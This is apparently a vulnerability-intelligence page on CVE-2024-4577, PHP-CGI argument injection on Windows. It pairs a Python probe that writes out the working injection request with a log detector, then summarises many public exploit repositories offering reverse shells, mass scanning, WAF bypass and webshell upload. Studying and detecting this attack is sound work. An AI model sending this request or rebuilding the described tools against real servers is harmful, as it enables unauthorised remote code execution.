PHP-CGI Argument Injection RCE on Windows
CVE-2024-4577 is a remote, unauthenticated argument injection vulnerability in PHP when run as CGI on Windows, typically under Apache. It affects PHP 8.1.x before 8.1.29, 8.2.x before 8.2.20, and 8.3.x before 8.3.8. The flaw arises from Windows "Best-Fit" character conversion on certain code pages: characters such as the soft hyphen (byte 0xAD, sent as %AD in a URL) are converted into a standard hyphen during command-line processing, so attacker-controlled query-string data that does not look like an option to the web server reaches php.exe as one. A CGI server passes the query string to the script as command-line arguments only when it contains no unencoded "=", which is why exploits encode "=" as %3D. This bypasses the hardening added for CVE-2012-1823, whose check for a leading hyphen runs before the character conversion takes place, and allows an attacker to inject PHP runtime options such as auto_prepend_file and allow_url_include. In practical exploitation, attackers set auto_prepend_file=php://input and supply PHP code in the HTTP request body, forcing the interpreter to execute that code before the target script runs. The issue is specific to Windows PHP-CGI deployments (the exploit summaries below note that it triggers on Simplified Chinese, Traditional Chinese and Japanese system locales and that default XAMPP installations expose /php-cgi/php-cgi.exe) and does not apply to configurations using mod_php rather than CGI.
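As an added example, not code from this page or from any of the repositories summarized below, the following Python reproduces the request shape described above (the %AD soft-hyphen byte in place of "-", allow_url_include and auto_prepend_file=php://input in the query string, PHP in the POST body) as a benign probe that only echoes an md5 marker, and pairs it with a detector that applies the same Best-Fit normalization to query strings in Apache access logs so that both the %AD variant and the older literal "-d" form are flagged. The probe path, the seed string and the sample log lines are assumptions/constructed data.

```python
"""Added example: CVE-2024-4577 probe builder and access-log detector.

Not code from this page or from any repository it summarizes. The probe
path, the seed string and the sample log lines are assumptions/constructed.
"""
import hashlib
import re
from urllib.parse import unquote_to_bytes, urlsplit

# php.ini directives the injection switches on (see the exploit summaries
# on this page); any of them next to a CLI option switch is the signal.
INJECTED_DIRECTIVES = ("allow_url_include", "auto_prepend_file", "cgi.force_redirect")

# A PHP CLI switch at a token boundary: "-d name=value", "-n", "-s", ...
OPTION_RE = re.compile(r"(?:^|\s)-[a-zA-Z]")

# Apache combined log: method, request target and status are all we need.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def build_probe(base_url, path="/php-cgi/php-cgi.exe", seed="cve-2024-4577-probe"):
    """Return (url, body, expected_marker) for a benign execution probe.

    %AD is the raw soft-hyphen byte. On the affected Windows code pages
    Best-Fit conversion turns it into '-', so php-cgi.exe receives
    '-d allow_url_include=1 -d auto_prepend_file=php://input'.
    '=' is sent as %3D because a CGI server only passes the query string
    as command-line arguments when it contains no unencoded '='.
    The POST body is prepended to the target script; it only echoes an
    md5 of the seed, so a hit is recognisable without running a command.
    """
    marker = hashlib.md5(seed.encode()).hexdigest()
    query = "%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput"
    url = base_url.rstrip("/") + path + "?" + query
    body = "<?php echo md5('%s'); die(); ?>" % seed  # hypothetical benign payload
    return url, body, marker


def response_indicates_execution(response_text, marker):
    """True when the marker echoed by the prepended PHP is in the response."""
    return marker in response_text


def normalize_query(raw_query):
    """Percent-decode a query string and apply the one Best-Fit mapping that
    matters here: byte 0xAD (soft hyphen) becomes '-'. Other bytes are
    decoded leniently so that arbitrary encodings do not raise."""
    raw = unquote_to_bytes(raw_query.replace("+", " "))
    return raw.replace(b"\xad", b"-").decode("latin-1")


def query_is_argument_injection(raw_query):
    """Flag a query string that, after normalisation, carries a PHP CLI
    switch together with one of the directives the exploit injects.
    Catches both the %AD variant and the plain '-d' (CVE-2012-1823) form."""
    q = normalize_query(raw_query)
    return bool(OPTION_RE.search(q)) and any(d in q for d in INJECTED_DIRECTIVES)


def find_injection_attempts(log_lines):
    """Scan Apache combined-log lines; return (line_no, path, status) for
    each request whose query string matches the injection pattern."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.query and query_is_argument_injection(target.query):
            hits.append((line_no, target.path, int(m.group("status"))))
    return hits


# Constructed sample log lines (not real traffic): two injection attempts,
# one with the soft-hyphen byte and one with a literal '-d', plus two
# benign requests that contain a hyphen or a directive name by chance.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2024:12:01:02 +0000] "POST /php-cgi/php-cgi.exe'
    '?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp%3A%2F%2Finput'
    ' HTTP/1.1" 200 5120 "-" "python-requests/2.31"',
    '203.0.113.7 - - [10/Jun/2024:12:01:03 +0000] "POST /index.php'
    '?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input'
    ' HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Jun/2024:12:02:10 +0000] "GET /index.php?page=foo-bar&id=1'
    ' HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jun/2024:12:02:11 +0000] "GET /search?q=allow_url_include'
    ' HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    url, body, marker = build_probe("http://target.example")
    print("probe:", url)
    print("body :", body)
    print("hits :", find_injection_attempts(SAMPLE_LOG))
```

To run the probe against a host you are authorized to test, POST the returned body to the returned URL (for example with curl --data-binary) and pass the response text to response_indicates_execution; the detector side needs nothing but the log lines. The detector deliberately requires both a CLI switch and a known directive, so ordinary hyphenated parameter values and search terms that happen to contain a directive name are not reported.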
Exploits
29 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (23 hidden).
This repository is a standalone Bash-based exploit toolkit centered on PHP8.1.x_Exploit.sh, which orchestrates detection and exploitation of four PHP CVEs using modular helper scripts under modules/. The main script normalizes target URLs, fingerprints the OS and PHP version via HTTP headers and a phpinfo.php probe, crawls homepage links and forms, enumerates likely CGI and upload endpoints, and then invokes per-CVE modules. The repository structure is simple: one main driver script, four CVE-specific Bash modules, one shared utils module, and a README. The primary exploit capability is CVE-2024-4577 against Windows PHP-CGI. The module tests two query-string injection variants, including the soft-hyphen bypass, by setting allow_url_include and auto_prepend_file=php://input and POSTing PHP code. On success it either demonstrates command execution with whoami or launches a PowerShell reverse shell to an operator-supplied IP and port. This is a real exploitation path providing RCE. A second remote capability targets CVE-2025-14177 by generating malformed JPEG files and POSTing them to discovered upload endpoints in a multipart form field named file. Detection looks for a marker string or long printable output in responses; exploitation repeats the upload 10 times and stores raw responses and extracted strings under a reports subdirectory, aiming to capture leaked heap data. The remaining two modules, CVE-2025-14180 and CVE-2025-14178, are effectively local checks and post-RCE crash payloads rather than remote exploits in their own right. Both use php -r locally when a PHP CLI is present; their exploit functions POST PHP snippets to a target URL only where remote code execution is already available. CVE-2025-14180 attempts to trigger a PDO PostgreSQL null dereference using the DSN pgsql:host=localhost;dbname=postgres with emulated prepares enabled. CVE-2025-14178 attempts an array_merge integer overflow by allocating extremely large arrays. Both are described as potentially crashing or destabilizing the PHP process.
Overall, this is an operational multi-CVE web exploitation script, not just a detector. It supports single-target and batch modes, optional GNU parallel execution, report logging, and automatic exploitation unless scan-only is specified. Fingerprintable targets include common CGI paths, common upload paths, phpinfo.php probing, php://input injection, localhost PostgreSQL access, and attacker-defined reverse-shell callback endpoints.
This repository contains a Python proof-of-concept exploit for CVE-2024-4577, a PHP-CGI argument injection vulnerability. The main file, cve-2024-4577.py, allows a user to test a remote server for the vulnerability and, if present, execute arbitrary PHP code via a crafted POST request to the /php-cgi/php-cgi.exe endpoint. The script accepts a target URL and an optional custom PHP payload, defaulting to phpinfo() for detection. If a custom payload is provided, it can be used to execute system commands (e.g., whoami) on the target. The exploit is operational and can be used for both detection and exploitation. The repository also includes a brief readme.md with usage instructions. No hardcoded IPs or domains are present; the endpoint is constructed based on user input.
This repository is a proof-of-concept (PoC) exploit for CVE-2024-4577, targeting PHP-CGI instances (such as those in XAMPP) on internal networks via DNS rebinding and browser-based attacks. The exploit consists of a Python server (server.py) that serves a malicious HTML/JavaScript client (client.html). The attacker configures the server with their DuckDNS credentials and public IP, and the client.html is delivered to the victim. When the victim opens the page, the JavaScript orchestrates a DNS rebinding attack using DuckDNS, causing the victim's browser to interact with internal PHP-CGI servers as if they were the attacker's server. The script then delivers a PHP payload (by default, executing 'calc' as a demonstration) to the internal server, exploiting CVE-2024-4577 for remote code execution. The exploit is highly configurable, allowing the attacker to specify payloads and target IPs. The repository demonstrates a sophisticated browser-to-internal-network attack chain, requiring only that the victim visit a malicious web page. The main files are server.py (Python HTTP server and DNS update logic), client.html (exploit logic and payload delivery), and README.md (detailed setup and usage instructions).
This repository is a comprehensive CTF challenge environment demonstrating exploitation of CVE-2024-4577, a critical PHP CGI argument injection vulnerability. The structure includes:
- **attack-scripts/**: Contains Python and Bash scripts (`exploit.py`, `exploit.sh`, `container-escape.py`) to automate exploitation, file reading, command execution, container escape, and AWS pivoting.
- **vulnerable-app/**: A minimal PHP web application (`index.php`, `info.php`) and Dockerfile, intentionally misconfigured to run PHP in CGI mode and allow argument injection. The flag file (`/flag.txt`) is the main target.
- **kubernetes/**: Manifests for deploying the vulnerable app in a Kubernetes cluster, with privileged containers, host mounts (`/host`, `/dev`, `/proc`, `/sys`), and Docker socket exposure for advanced exploitation and container escape scenarios. AWS credentials are provided via ConfigMap for cloud pivoting.
- **docker/**: Docker Compose and frontend files for local or CTF deployment.
- **Documentation**: Multiple guides and walkthroughs detail exploitation steps, deployment, and security considerations.
**Exploit Capabilities:**
- Exploits CVE-2024-4577 via HTTP requests with crafted PATH_INFO to inject PHP command-line arguments, enabling arbitrary file read (e.g., `/flag.txt`), command execution, and code execution.
- Advanced scripts attempt container escape by accessing host filesystems and the Docker socket, and pivot to AWS using the provided credentials.
- Can establish a reverse shell if the attacker provides a listener IP and port.
**Endpoints:**
- Main HTTP endpoint (default: `http://localhost:8080` or via Kubernetes LoadBalancer/Ingress)
- File targets: `/flag.txt`, `/etc/passwd`, `/host`, `/var/run/docker.sock`, and others
- AWS resources (via fake credentials in the CTF)
**Purpose:** The repository is designed for educational and CTF use, providing a realistic, multi-stage exploitation chain: initial web exploit, container escape, and cloud pivoting. It demonstrates the risks of insecure PHP CGI configurations, container privilege escalation, and cloud credential exposure. The environment is highly configurable for both local and internet-facing deployments, with extensive documentation and security warnings. One caveat for anyone using it to validate detections: the Best-Fit character conversion that defines CVE-2024-4577 is specific to Windows, so if the container image is Linux-based, what the environment actually exercises is the underlying PHP-CGI argument-injection pattern (the CVE-2012-1823 style, with a literal hyphen) rather than the soft-hyphen bypass itself.
This repository provides a proof-of-concept (POC) environment and exploit for CVE-2024-4577, a critical PHP CGI argument injection vulnerability on Windows. The repository includes configuration files (httpd.conf, httpd-xampp.conf) to set up an Apache + PHP-CGI environment, a check.php script to verify if the environment is vulnerable, and a test.php script to confirm PHP is working. The Readme provides a sample exploit using a POST request to inject PHP code via the query string, exploiting improper argument parsing in PHP CGI mode. The main attack vector is network-based, targeting a web server running vulnerable PHP in CGI mode. The exploit allows remote code execution by injecting PHP code that is executed by the server. The repository is structured to help users set up a vulnerable environment for testing and demonstration purposes, not for weaponized exploitation.
This repository contains a Python proof-of-concept exploit for CVE-2024-4577, a critical remote code execution vulnerability in PHP-CGI on Windows. The main script, 'CVE-2024-4577.py', takes a list of target domains and attempts to exploit them by sending a POST request with a crafted query string that abuses PHP-CGI argument injection. The payload '<?php phpinfo(); ?>' is sent in the request body, and the script checks the response for evidence of code execution (the presence of 'PHP Version'). Vulnerable endpoints are logged to 'vulnerable.txt'. The exploit is multithreaded for mass scanning and is intended for use against PHP installations on Windows that have not been patched to the latest versions. The repository also includes a README with usage instructions and a requirements.txt for dependencies. No hardcoded IPs or domains are present; targets are user-supplied via a file.
This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a PHP CGI argument injection vulnerability that enables remote code execution. The main file, CVE-2024-4577.py, is a Python script that takes a target URL and arbitrary PHP code as arguments. It crafts a POST request to the specified PHP endpoint, exploiting the argument injection flaw to prepend and execute the supplied PHP code on the server. The script checks for successful exploitation by looking for a specific marker ('1337') in the response. The exploit is network-based, requiring access to a vulnerable PHP CGI endpoint over HTTP. The repository is minimal, containing only the exploit script and a brief README. No hardcoded endpoints are present, but the usage example references 'http://192.168.1.1/index.php' as a target. The exploit is a PoC and does not include advanced payloads or automation for post-exploitation.
This repository provides tools for detecting and exploiting CVE-2024-4577, a critical PHP CGI argument injection vulnerability affecting Windows systems running PHP in CGI mode. The repository contains two main Python scripts: 1. CVE-2024-4577.py: A scanner that tests whether a given URL (or list of URLs) is vulnerable by sending a PHP payload and checking for a known hash in the response. It targets common CGI endpoints such as /php-cgi/php-cgi.exe, /index.php, /test.php, and /test.hello, using specially crafted query strings to trigger the vulnerability. 2. exploit.py: An exploit tool that allows the user to execute arbitrary system commands on a vulnerable server. It sends a PHP payload via HTTP POST to the vulnerable endpoint, which executes the specified command on the server and returns the output. The repository also includes a requirements.txt for dependencies and a README.md with detailed usage instructions, example commands, and background on the vulnerability. The exploit is operational, providing real command execution on vulnerable targets, and is not part of a larger framework. The main attack vector is network-based, targeting HTTP(S) endpoints exposed by PHP CGI on Windows. The endpoints tested are fingerprintable and can be used to identify potentially vulnerable systems.
This repository contains a proof-of-concept exploit for CVE-2024-4577, a remote code execution vulnerability in PHP CGI versions 8.1, 8.2, and 8.3 on Windows. The main file, 'exploit.c', is a C program that leverages libcurl and Winsock2 to send crafted HTTP POST requests to a vulnerable PHP CGI endpoint, allowing the attacker to execute arbitrary system commands on the target server. The exploit supports both direct command execution and reverse shell functionality (if a listening port is specified). It also logs activity to a local file ('CVE-2024-4577.log'). The README provides build and usage instructions, including example commands. The exploit is not part of a framework and is intended for manual use. No hardcoded IPs or domains are present; the target endpoint is user-supplied. The code is structured for clarity, with argument parsing, HTTP request handling, and optional reverse shell logic.
This repository contains a single Python exploit script (CVE-2024-4577.py) targeting the PHP CGI Argument Injection Remote Code Execution vulnerability (CVE-2024-4577). The exploit is operational and allows an attacker to execute arbitrary system commands on a vulnerable server by abusing improper argument handling in PHP CGI. The script supports both single-target and multi-target modes, using HTTP POST requests to various common PHP CGI endpoints (e.g., /php-cgi/php-cgi.exe, /cgi-bin/php-cgi.exe, etc.). It injects PHP configuration arguments via specially crafted URLs and delivers a PHP payload that executes attacker-supplied commands. The exploit is multi-threaded for mass scanning and includes output formatting and progress indication. The README is minimal and only references the exploit file. No detection-only or fake code is present; the script is a real exploit for RCE. The main attack vector is network-based, requiring HTTP(S) access to a vulnerable PHP CGI endpoint.
This repository contains a PowerShell proof-of-concept exploit for CVE-2024-4577, a PHP-CGI argument injection vulnerability. The main script, 'cve_2024_4577.ps1', defines a function that sends a specially crafted POST request to the '/php-cgi/php-cgi.exe' endpoint on target hosts within the 10.0.0.0/24 subnet, using both HTTP and HTTPS. The payload is a simple PHP script that executes the 'whoami' command, demonstrating remote code execution if the target is vulnerable. The script loops through all IPs in the subnet and both protocols, outputting the result for each attempt. The repository is structured with a single exploit script, a README with usage and background information, and a license file. No hardcoded credentials or external dependencies are present, though the target range itself is hardcoded and must be edited for any other network. The exploit is intended for educational and authorized penetration testing purposes only.
This repository provides a Python-based exploit for CVE-2024-4577, a PHP CGI argument injection vulnerability that enables remote code execution (RCE) on vulnerable PHP installations running in CGI mode on Windows. The main exploit logic is contained in 'main.py', which accepts a list of target URLs (either as a comma-separated string or from a file) and a command to execute. The script sends a specially crafted POST request to each target, exploiting the argument injection flaw to execute arbitrary system commands. The exploit supports parallel execution across multiple CPU cores for efficiency and logs successfully exploited targets to a file. The only code file is 'main.py', with dependencies listed in 'requirements.txt'. The attack vector is network-based, targeting HTTP endpoints running vulnerable PHP CGI. The exploit is operational, requiring the attacker to specify the command to execute, and provides full RCE if successful. No hardcoded IPs or domains are present; the targets are user-supplied.
This repository is a comprehensive exploit toolkit targeting PHP-CGI parameter injection vulnerabilities, specifically CVE-2024-4577 and CVE-2024-8926. The main exploit logic resides in 'exploit.py', which provides a command-line interface for automated vulnerability scanning and exploitation. The tool supports multiple attack modes, including remote command execution, arbitrary PHP code execution, file upload, and file download. It allows users to specify target URLs and CGI endpoints, select or customize payloads, and optionally route traffic through Tor for anonymity. A notable feature is the modular bypass system: the 'bypass_manager.py' and the 'bypass_modules/' directory provide various tamper scripts to obfuscate payloads and evade WAFs or security controls. These modules can modify payloads, CGI paths, HTTP headers (e.g., randomizing User-Agent, adding X-Forwarded-For), and more. The tool also supports forced exploitation mode, detailed logging, and animated terminal output for usability. The repository is structured as follows: - 'exploit.py': Main exploit script and entry point. - 'bypass_manager.py' and 'bypass_modules/': Framework for WAF bypass and payload tampering. - 'tor_helper.py': Utilities for routing requests through Tor. - 'requirements.txt': Python dependencies. - 'README.md': Detailed usage instructions, attack modes, and legal disclaimer. The exploit is operational, providing real attack capabilities against vulnerable PHP-CGI deployments. It is not a detection-only script, but a full-featured exploitation tool with customizable payloads and bypass techniques. The main attack vector is network-based, targeting web servers exposing PHP-CGI endpoints. The tool is suitable for red team operations, CTFs, and security research.
This repository contains a Python exploit script (CVE-2024-4577.py) targeting the argument injection vulnerability in PHP (CVE-2024-4577). The script allows the user to scan a single target or a list of targets (provided in domains.txt) for the vulnerability by sending a specially crafted POST request to the /index.php endpoint of each target. The payload, supplied via the -c/--command argument, is arbitrary PHP code that will be executed on the server if the target is vulnerable. The script checks for successful code execution by looking for a specific marker ('gotr00t') in the response. The repository also includes a README.md with usage instructions and a requirements.txt listing the Python dependencies (requests, colorama). The exploit is operational and can be used to achieve remote code execution on vulnerable PHP installations accessible over the network.
This repository provides operational exploit scripts for CVE-2024-4577, which its README describes as a remote code execution vulnerability affecting PHP 5 and 7. That version claim does not match the advisory's affected range (8.1.x, 8.2.x and 8.3.x on Windows, see above); the directives the scripts inject, allow_url_include and auto_prepend_file, are the same ones used in CVE-2012-1823-era PHP-CGI exploitation, which is likely the source of the confusion. The repository contains two main Python scripts: 'cek.py' and 'cuk.py'. - 'cek.py' allows an attacker to execute arbitrary system commands on a vulnerable PHP server by injecting the allow_url_include and auto_prepend_file directives via a crafted POST request. It supports listing directories, reading files, and finding writable directories on the target server. - 'cuk.py' is used to upload a remote PHP shell ('ini.php') from a GitHub repository to the target server's /tmp directory, enabling persistent access. Both scripts require the attacker to specify a target URL (typically an index.php endpoint) and leverage a POST request with a malicious PHP payload. The exploit is network-based and targets publicly accessible PHP endpoints. The repository is structured with a README providing usage instructions and two Python scripts implementing the exploit logic. No detection scripts or fake exploits are present; the code is functional and provides real RCE capabilities.
This repository provides a Python-based exploit and scanner for CVE-2024-4577, a PHP CGI Argument Injection vulnerability affecting PHP versions 8.1.x before 8.1.29, 8.2.x before 8.2.20, and 8.3.x before 8.3.8 on Windows systems running Apache with PHP-CGI. The main script, CVE-2024-4577.py, can scan a list of target URLs for the vulnerability and, if found, exploit it by sending arbitrary PHP code (such as a reverse shell) via a specially crafted HTTP POST request. The exploit leverages a flaw in how PHP-CGI parses command-line arguments, allowing attackers to inject PHP options and execute code. The README provides detailed usage instructions, including how to prepare a PHP payload for remote code execution and how to use the tool for both scanning and exploitation. The repository is operational, requiring the attacker to supply a PHP payload file, and is capable of establishing a reverse shell to a specified host and port. The exploit targets network-accessible HTTP endpoints, particularly /php-cgi/php-cgi.exe, and is especially effective against default XAMPP installations on Windows.
This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a vulnerability in PHP CGI that allows for argument injection and remote code execution. The main file, CVE-2024-4577.py, is a Python script that takes as arguments the remote host, port, target URL path, and a PHP command to execute. It crafts an HTTP POST request to the target, exploiting the vulnerability by injecting PHP configuration directives via the query string and sending arbitrary PHP code in the POST body. The script checks for successful execution by looking for a specific string ('PWNED!') in the response. The repository also includes a README.md with usage instructions. No hardcoded IPs or domains are present; the target is specified by the user at runtime. The exploit is a functional PoC and demonstrates the ability to execute arbitrary PHP code on vulnerable servers.
This repository contains a Python exploit script (CVE-2024-4577.py) and a README.md for CVE-2024-4577, a critical argument injection vulnerability in PHP running on Windows (notably in XAMPP environments). The exploit targets php-cgi.exe via HTTP(S) requests, leveraging encoding conversion issues to bypass previous mitigations and achieve unauthenticated remote code execution (RCE). The script supports both direct and blind RCE, with options to save output and test various payload delivery methods (php://input, data://, php://filter). It can also set up a local listener to detect outbound requests from the target in blind RCE scenarios. The README provides detailed usage instructions, exploitation conditions, and background on the vulnerability. The main fingerprintable endpoint is '/php-cgi/php-cgi.exe', which is used for the attack. The exploit is operational, allowing arbitrary PHP code execution on vulnerable targets.
This repository provides a Python-based exploit and scanner for CVE-2024-4577, a PHP CGI Argument Injection vulnerability affecting PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, and 8.3.* before 8.3.8 on Windows systems. The main file, CVE-2024-4577.py, can scan a target for vulnerability and exploit it by sending a specially crafted HTTP POST request to a PHP CGI endpoint (such as /php-cgi/php-cgi.exe), injecting arbitrary PHP code provided by the attacker. The exploit supports custom PHP payloads, including reverse shells. The README provides detailed usage instructions, example payloads, and references. The repository is operational and can be used to achieve remote code execution on vulnerable servers. The only code file is in Python, and the exploit is not part of a larger framework.
This repository provides a working exploit for CVE-2024-4577, a critical remote code execution vulnerability affecting PHP on Windows (versions 8.3 < 8.3.8, 8.2 < 8.2.20, 8.1 < 8.1.29) when PHP-CGI is exposed. The repository contains two main Python scripts: - CVE_2024_4577_POC.py: A proof-of-concept scanner that reads a list of URLs from 'urls.txt' and tests each for the vulnerability by sending a crafted POST request to the '/php-cgi/php-cgi.exe' endpoint. It checks for code execution by looking for a specific string in the response. - CVE_2024_4577_exp.py: An exploit script that allows the user to specify an arbitrary system command to execute on the vulnerable server, again via a POST request to the same endpoint. The PHP payload is injected via the request body and executed by the server if vulnerable. The README provides brief usage instructions. The exploit leverages the ability to pass PHP parameters via the query string to the CGI binary, bypassing restrictions and enabling arbitrary code execution. The attack vector is network-based, requiring only HTTP access to the vulnerable endpoint. The scripts are operational and allow for both detection and exploitation of the vulnerability.
This repository contains a Python exploit script (xampp.py) and a README for CVE-2024-4577, a remote code execution vulnerability affecting PHP CGI on Windows systems, specifically those configured in Simplified Chinese, Traditional Chinese, or Japanese. The exploit is designed for bulk exploitation: it reads a list of target URLs from 'xamp.txt', then uses multiple threads (default 1000) to send specially crafted POST requests to common PHP CGI endpoints (/cgi-bin/php-cgi.exe and /php-cgi/php-cgi.exe). The payloads attempt to enable 'allow_url_include' and 'auto_prepend_file' via query parameters, then inject PHP code to test for code execution. If successful, the script writes the vulnerable URLs and responses to output files. The exploit demonstrates code execution by issuing a ping to an attacker-controlled DNS domain (win.kyeezvd0.dnslog.pw), which can be monitored for callbacks. The README provides usage instructions and highlights the need to adjust the command, input file, and thread count as needed. The repository is operational and suitable for real-world exploitation, not just proof-of-concept.
This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a PHP CGI Argument Injection vulnerability that enables remote code execution (RCE) on vulnerable PHP installations running on Windows. The repository consists of two files: a detailed README.md explaining the vulnerability, affected versions, and usage instructions, and a Python script (watchTowr-vs-php_cve-2024-4577.py) that implements the exploit logic. The exploit works by sending a specially crafted POST request to a target PHP CGI endpoint, injecting PHP code via manipulated CGI arguments. The script requires the user to specify a target URL and the PHP code to execute. If successful, the script confirms code execution by checking for a unique marker in the response. The exploit targets PHP versions 8.3 < 8.3.8, 8.2 < 8.2.20, and 8.1 < 8.1.29 on Windows. No detection or fake code is present; this is a functional PoC exploit for RCE via network attack vector.
This repository provides a proof-of-concept (PoC) and operational exploit for CVE-2024-4577, a critical remote code execution vulnerability affecting PHP (versions 8.1.x < 8.1.29, 8.2.x < 8.2.20, 8.3.x < 8.3.8) when run as CGI on Windows (commonly with Apache, e.g., XAMPP). The main exploit script (CVEs-2024-4577.py) is written in Python and can both scan for and exploit the vulnerability. It works by sending specially crafted HTTP POST requests to vulnerable endpoints (such as /php-cgi/php-cgi.exe, /index.php, etc.), injecting PHP options via command-line arguments to enable remote code execution. If exploitation is successful, the script can upload and execute a PHP payload (rev_shell.php), which is a reverse shell that connects back to the attacker's machine, granting remote command execution. The repository includes a requirements.txt for dependencies, a sample reverse shell payload (rev_shell.php), and a detailed README.md with usage instructions, references, and detection tips. The exploit is operational and can be used for both vulnerability scanning and full exploitation, depending on the provided arguments.
This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a critical remote code execution (RCE) vulnerability affecting certain versions of PHP when run as CGI on Windows with Apache. The exploit is implemented in a single Python script (CVE-2024-4577.py), which allows the user to test a single URL or scan multiple URLs for vulnerability. The script works by sending a specially crafted POST request to the PHP-CGI endpoint, injecting PHP options via the query string to enable code execution. If the target is vulnerable, the script provides an interactive shell for arbitrary command execution on the remote server. The repository also includes a README.md with background information and a requirements.txt listing Python dependencies. The main attack vector is network-based, targeting HTTP endpoints that expose the vulnerable PHP-CGI binary. The exploit is a PoC and does not include advanced payload customization or post-exploitation features.
This repository contains a Python exploit script (CVE-2024-4577-PHP-RCE.py) and a detailed README for CVE-2024-4577, a critical remote code execution vulnerability in PHP for Windows (including XAMPP) when running in CGI mode. The exploit leverages improper handling of CGI parameters (notably cgi.force_redirect and REDIRECT-STATUS) to achieve RCE or arbitrary file read, even with default PHP configurations. The script implements two main exploitation methods: (1) sending a crafted HTTP request to the vulnerable php-cgi endpoint to trigger code execution or file inclusion, and (2) communicating directly with the FastCGI service to send malicious parameters and retrieve output. The README provides additional exploitation techniques (EXP 3 and 4) using POST requests and data:// payloads, and lists all affected PHP and XAMPP Windows versions. The exploit does not require special configuration on the target and is effective against default installations. The main fingerprintable endpoint is the /php-cgi/php-cgi.exe path on the target server, and the exploit demonstrates reading the system.ini file as proof of concept. The repository is operational and provides working exploit code for this vulnerability.
This repository contains a Nuclei template (CVE-2024-4577.yaml) and a README file. The template is a Proof of Concept (PoC) exploit for CVE-2024-4577, a critical PHP CGI argument injection vulnerability. The exploit works by sending a specially crafted HTTP POST request to a PHP CGI endpoint (e.g., /index.php) with manipulated query parameters that enable 'allow_url_include' and set 'auto_prepend_file' to 'php://input'. The POST body contains PHP code (phpinfo()), which, if the server is vulnerable, will be executed, demonstrating remote code execution. The template checks for successful exploitation by looking for 'PHP Version' in the response body and a 200 status code. The repository is structured for use with the Nuclei vulnerability scanner and is intended for security testing and demonstration purposes.
This repository contains a proof-of-concept (PoC) exploit for CVE-2024-4577, a PHP CGI Argument Injection vulnerability that enables remote code execution (RCE) on Windows systems running vulnerable versions of PHP in CGI mode. The repository consists of a README.md with background, affected versions, and references, and a Python script (watchTowr-vs-php_cve-2024-4577.py) that implements the exploit. The script takes a target URL and arbitrary PHP code as arguments, then sends a specially crafted POST request to the target, exploiting the argument injection to execute the supplied PHP code. The exploit checks for success by looking for a specific marker in the response. The main attack vector is network-based, targeting web servers accessible over HTTP. The exploit is a PoC and requires the attacker to supply the PHP code to be executed, demonstrating the vulnerability's impact but not providing a weaponized or automated payload.
This repository contains a Python exploit script (CVE-2024-4577.py) targeting the argument injection vulnerability in PHP (CVE-2024-4577). The script allows the user to scan a single target or a list of targets (provided in 'domains.txt') for the vulnerability. It works by sending a specially crafted POST request to the '/index.php' endpoint of the target, attempting to inject and execute arbitrary PHP code via the 'auto_prepend_file' argument. The exploit checks for successful code execution by looking for a specific string in the response. The repository includes a README with usage instructions and a requirements.txt for dependencies. The main exploit file is self-contained, multithreaded for scanning multiple domains, and operational, as it allows arbitrary command execution if the target is vulnerable.
This repository contains a Python-based scanner and exploit tool for CVE-2024-4577, a critical PHP CGI argument injection vulnerability that can lead to remote code execution (RCE). The main script, CVE-2024-4577.py, provides both scanning and exploitation capabilities. It reads a list of target URLs from a file, checks each for vulnerability by sending a crafted POST request, and, if vulnerable, can exploit the target by sending arbitrary PHP code (provided by the user in a separate file) to be executed on the server. Vulnerable targets are logged to 'victim.txt'. The tool is command-line driven, supports both scanning and exploitation modes, and uses the 'requests', 'colorama', and 'rich' Python libraries for HTTP requests and output formatting. The README provides detailed usage instructions, search queries for finding potential targets, and a disclaimer. The README states that the exploit targets PHP CGI installations on both Linux and Windows platforms, specifically versions 8.1, 8.2, and 8.3; note that the CVE-2024-4577 trigger depends on Windows Best-Fit conversion, so a Linux host would only respond to this tool if it were exposed to the older literal-hyphen argument injection.
Recent activity
39 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A PHP CGI argument injection vulnerability referenced as actively probed alongside CVE-2017-9841 in current multi-exploit scanning campaigns.
A specific remote code execution vulnerability observed being targeted against the Stockholm honeypot.
A critical remote code execution vulnerability in PHP CGI described as argument injection on the exposed C2 server.
A PHP-CGI argument injection vulnerability on Windows (CGI mode) that can lead to remote code execution.